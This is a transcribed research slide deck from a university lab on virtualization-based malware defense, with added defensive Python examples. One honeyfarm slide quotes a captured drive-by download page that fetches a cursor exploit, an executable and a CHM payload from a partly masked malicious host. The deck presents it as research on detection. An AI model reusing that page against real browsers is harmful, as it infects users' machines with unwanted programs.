Research at FRIENDS Lab
http://friends.cs.purdue.edu
Dongyan Xu, Associate Professor
Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS), Purdue University
Research Overview
Virtual Infrastructures
• VIOLIN virtual infrastructure
• Infrastructure adaptation
• Infrastructure snapshot
• Real-world deployment (http://www.nanohub.org)
Malware Defense
• Honeyfarm (Collapsar)
• Playground (vGround)
• VM introspection (OBSERV)
• OS information flow (Process Coloring)
• Kernel rootkit (NICKLE)
• Reverse engineering (AutoFormat)
Virtualization Technology (Xen, QEMU, VirtualBox, KVM, VMware)
Project 1: Process Coloring: Information Flow-based Malware Defense
Funded by IARPA through AFRL
One-sentence summary:
Propagating and logging provenance information (“colors”) along OS-level information flows for malware detection and sensitive data protection
Prototype integration with Southwest Research Institute
Demo CD completed today!
PC Usage Scenario: Server-Side Malware Defense
[Diagram: process tree with rcinit, s45named, s30sendmail, s55sshd, s80httpd/httpd, /bin/sh, wget, netcat and a rootkit; files: local files, /etc/shadow and confidential info; stages labelled "Initial coloring" and "Coloring diffusion", feeding a syscall log]
Capability 1: PC malware alert
“No shell process should have the color of Apache”
Capability 2: Color-based identification of malware break-in point
Capability 3: Color-based log partition for contamination analysis
Demo at: http://friends.cs.purdue.edu/projects/pc/pc-demo.html
PC Usage Scenario: Client-Side Malware Defense
[Diagram: processes firefox (Web Browser), notepad (Editor), turbotax (Tax) and warcraft (Games); Agobot and www.malicious.net; tax files]
PC malware alert
“Web browser and tax colors should never mix”
Demo at: http://friends.cs.purdue.edu/projects/pc/files/sinkfile.avi
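Both usage scenarios above, worked as a toy in Python. This is an added example, not the Process Coloring prototype's code; the service names, colors, syscall log entries and policy rules are constructed for illustration.

```python
from collections import defaultdict

# Initial coloring: each service and application gets its own color, so any
# later flow can be traced back to where it entered the system.
INITIAL = {"httpd": {"apache"}, "sshd": {"ssh"},
           "firefox": {"browser"}, "turbotax": {"tax"}}
SHELLS = {"sh", "bash"}

# Constructed syscall log (actor, syscall, target); not a real trace.
LOG = [
    ("httpd", "fork", "sh"),           # web server spawns a shell
    ("sh", "fork", "wget"),            # the shell spawns a downloader
    ("wget", "write", "/tmp/rk"),      # written file inherits wget's colors
    ("sshd", "read", "/etc/shadow"),   # legitimate access by an ssh-colored process
    ("turbotax", "write", "taxfile"),  # tax data becomes tax-colored
    ("firefox", "fork", "agobot"),     # browser launches a downloaded program
    ("agobot", "read", "taxfile"),     # browser-colored process reads tax data
]

def diffuse(log, initial):
    """Propagate colors along each logged flow; return colors, alerts, partition."""
    colors = defaultdict(set, {k: set(v) for k, v in initial.items()})
    alerts, partition = [], defaultdict(list)
    for i, (actor, call, target) in enumerate(log):
        # fork/write: actor -> target; read: target (file) -> actor
        src, dst = (target, actor) if call == "read" else (actor, target)
        colors[dst] |= colors[src]
        for c in colors[actor]:        # Capability 3: partition the log by color
            partition[c].append(i)
        # Capability 1: color-based policies checked on the receiving entity
        if dst in SHELLS and "apache" in colors[dst]:
            alerts.append((i, dst, "shell process carries the Apache color"))
        if {"browser", "tax"} <= colors[dst]:
            alerts.append((i, dst, "web browser and tax colors mixed"))
    return dict(colors), alerts, dict(partition)

def break_in_point(log, partition, color):
    """Capability 2: the earliest log entry in a color's partition, i.e. the
    flow where contamination carrying that color started."""
    return log[partition[color][0]]
```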
Project 2: Strategic Defense against Kernel Rootkit Attacks
Kernel rootkits: stealthy and foundational threat to cyberspace
Current defense:
• Symptom-based detection
• Disruption to production system
• Manual forensics
Strategic defense:
• Proactive indication before attack
• Automatic avoidance by “steering away” production system (non-stop operation)
• Live forensics for future protection
Integrated Defense Scenario
[Diagram, two panels: "Right before attack" and "After threat indication". Labels: Production VM and Forensics VM (each a Guest OS on a VMM), Indication, Fork, Avoidance, Rootkit Profile, Kernel Guarding Code, Clean-up, Forensics]
Results with Real-World Kernel Rootkits
Indicating and preventing kernel rootkit attacks at VMM level
[RAID08 Best Paper Award]
Thank you!
For more information:
URL: http://friends.cs.purdue.edu (on a VM)
Google: “Purdue virtualization friends”
Email: [email protected]
NICKLE: Kernel Rootkit Indicator (“No Instruction Creeping into Kernel Level Executed”)
[Diagram: Guest OS above a VMM running NICKLE; standard memory and shadow memory, each holding Kernel Code]
Step 1: Create two memory spaces: standard memory and shadow memory
Step 2: Authenticate and copy kernel code to shadow memory
Step 3: Memory access dispatch: kernel code fetch -> shadow memory; all other accesses -> standard memory
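The three steps above, worked as a toy VMM in Python. This is an added example, not NICKLE's implementation: the memory layout, the kernel code bytes and the hash-based authentication are assumptions, as is the rule that a fetch of bytes never authenticated into the shadow is what raises the indication.

```python
import hashlib

MEM_SIZE = 0x2000       # constructed guest memory size
KERNEL_TEXT = 0x1000    # constructed load address of the kernel code

class NickleVMM:
    """Toy model of NICKLE's memory access dispatch (added example)."""
    def __init__(self, known_good_digests):
        self.standard = bytearray(MEM_SIZE)       # Step 1: standard memory
        self.shadow = bytearray(MEM_SIZE)         # Step 1: shadow memory
        self.authenticated = bytearray(MEM_SIZE)  # 1 where shadow holds verified code
        self.known_good = set(known_good_digests)
        self.indications = []                     # addresses of unauthorized fetches

    def authenticate_and_copy(self, addr, size):
        """Step 2: copy kernel code to shadow memory only if its hash is known good."""
        code = bytes(self.standard[addr:addr + size])
        if hashlib.sha256(code).hexdigest() not in self.known_good:
            return False
        self.shadow[addr:addr + size] = code
        self.authenticated[addr:addr + size] = b"\x01" * size
        return True

    # Step 3: dispatch. Data reads and writes always go to standard memory...
    def write(self, addr, data):
        self.standard[addr:addr + len(data)] = data

    def read(self, addr, size):
        return bytes(self.standard[addr:addr + size])

    def fetch(self, addr, size):
        """...while a kernel instruction fetch is served from shadow memory only.
        Assumed indication rule: fetching bytes never authenticated into the
        shadow is reported as an attempt to run unauthorized kernel code."""
        if not all(self.authenticated[addr:addr + size]):
            self.indications.append(addr)
        return bytes(self.shadow[addr:addr + size])

def scenario():
    good_code = b"\x90" * 16 + b"\xc3"                 # constructed kernel code bytes
    vmm = NickleVMM({hashlib.sha256(good_code).hexdigest()})
    vmm.write(KERNEL_TEXT, good_code)                  # kernel loaded at boot
    ok = vmm.authenticate_and_copy(KERNEL_TEXT, len(good_code))
    vmm.write(KERNEL_TEXT, b"\xcc" * 4)                # later in-place write into kernel code
    executed = vmm.fetch(KERNEL_TEXT, 4)               # CPU still fetches the verified copy
    vmm.write(0x1800, b"\xeb\xfe")                     # bytes placed elsewhere in kernel space
    injected = vmm.fetch(0x1800, 2)                    # fetch hits never-authenticated shadow
    return ok, executed, vmm.read(KERNEL_TEXT, 4), injected, vmm.indications
```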
Collapsar Honeyfarm
[Diagram: Domains A, B and C, each with a Redirector, forward traffic to the Front-End of the Collapsar Center, which hosts the VM-based Honeypots, a Correlation Engine and a Management Station]
Benefit 1: Centralized management of honeypots w/ distributed presence
Benefit 2: Off-site attack occurrence
Benefit 3: Convenience for real-time attack correlation and log mining
[USENIX Security’04]
Collapsar as a Client-side Honeyfarm
[Diagram: Domains A, B and C, each with a Redirector, connect through the Front-End to the VM-based Honeypots at the Collapsar Center, which in turn visit a Malicious Web Server]
Active Honeypots w/ Vulnerable Client-side Software
• Web Browsers (e.g., IE, Firefox, …)
• Email Clients (e.g., Outlook, …)
[HoneyMonkey, NDSS’06]
PlanetLab (310 sites)
288 malicious sites / 2 zero-day exploits
Upon clicking a malicious URL http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
22 unwanted programs installed without user’s consent!
MS04-013
MS03-011
MS05-002
<html><head><title></title></head><body>
<style>* {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")}</style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1><PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET><script>
try{document.write('<object data=`ms-its:mhtml:file://C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');}catch(e){} </script>
</body></html>
A Real Incident [JPDC’06]
vGround: A Virtual Worm Playground (demo)
dallas.cs.purdue.edu
• High fidelity: VM with full-system virtualization
• Strict confinement: VN with link-layer network virtualization
• Easy deployment: locally deployable
• Efficient experiments: image generation time 60 seconds, boot-strap time 90 seconds, tear-down time 10 seconds
A Worm Playground
In “Fighting Computer Virus Attacks”, Peter Szor, USENIX Security Symp., 2004
[RAID’05]
State-of-the-art malware defense: running anti-malware software inside the monitored system
• Advantage: they can see everything (e.g., files, processes…)
• Disadvantage: they may not see anything!
[Diagram: VirusScan, Firefox and IE running on the OS Kernel inside the monitored system]
OBSERV: “Out-of-the-Box” Malware Detection
Why “Out-of-the-Box”? The current approach is fundamentally flawed:
• Anti-malware software and protected software run at the same privilege level
• Lack of root-of-trust
Solution: going “out-of-the-box”
[Diagram: Firefox, IE and the OS Kernel inside the guest; VirusScan placed outside, at the Virtual Machine Monitor (VMM) level]
The “Semantic-Gap” Challenge
What we can observe:
• Low-level states: memory pages, disk blocks…
• Low-level events: privileged instructions, interrupts, I/O…
What we want to observe:
• High-level semantic states: files, processes…
• High-level semantic events: system calls, context switches…
[Diagram: Guest OS on a Virtual Machine Monitor (e.g., VMware, Xen); VirusScan outside the guest, with the Semantic Gap between it and the Guest OS]
Our Solution: OBSERV
OBSERV: “Out-of-the-Box” with SEmantically Reconstructed View
A new mechanism missing in existing VMMs
[Diagram: Firefox, IE and the OS Kernel in the guest; OBSERV at the Virtual Machine Monitor (VMM)]
[ACM CCS’07]
New Capabilities Enabled by OBSERV
Capability I: Invisible system logging
Capability II: Malware detection by view comparison
Capability III: External run of COTS anti-malware software
[Diagram: Firefox, IE and the OS Kernel in the guest on a Virtual Machine Monitor (VMM) with OBSERV; the OBSERV View and the Inside-the-box View are compared in a View Diff]
AutoFormat: Malware Protocol Reverse Engineering
Given a malware binary, infer the malware protocol format
[NDSS’08]
Inferring Slapper Worm (Botnet) Protocol
[Figure: inferred message format annotated with a nested data structure declaration and a compiler-inserted gap; field markers 1, 2, 3 and 1, 2]
VIOLIN: Portable, Adaptive Virtual Environments
Adaptive Virtual Environments on a shared hosting infrastructure
[Diagram: virtual environments connected over the Internet; two DB nodes]
[TR’03, IEEE Computer’05]
Adaptation Architecture and Sample Scenario (Demo)
[Diagram: VMs on VMMs connected by VIOLIN Switches over the Physical Network; a Monitoring Daemon on each host reports to the Adaptation Manager; adaptation actions shown: Scale Up, CPU Update, Migrate]
[IEEE ICAC’06]
Live VIOLIN Snapshot (Demo)
Useful for application- and OS-transparent recovery from:
• Crashes, failures, and disasters
• Unexpected power/network outage
And for VIOLIN replay
[Diagram: two hosting centers, labelled Snapshot and Resume]
[ACM/IEEE VTDC’07]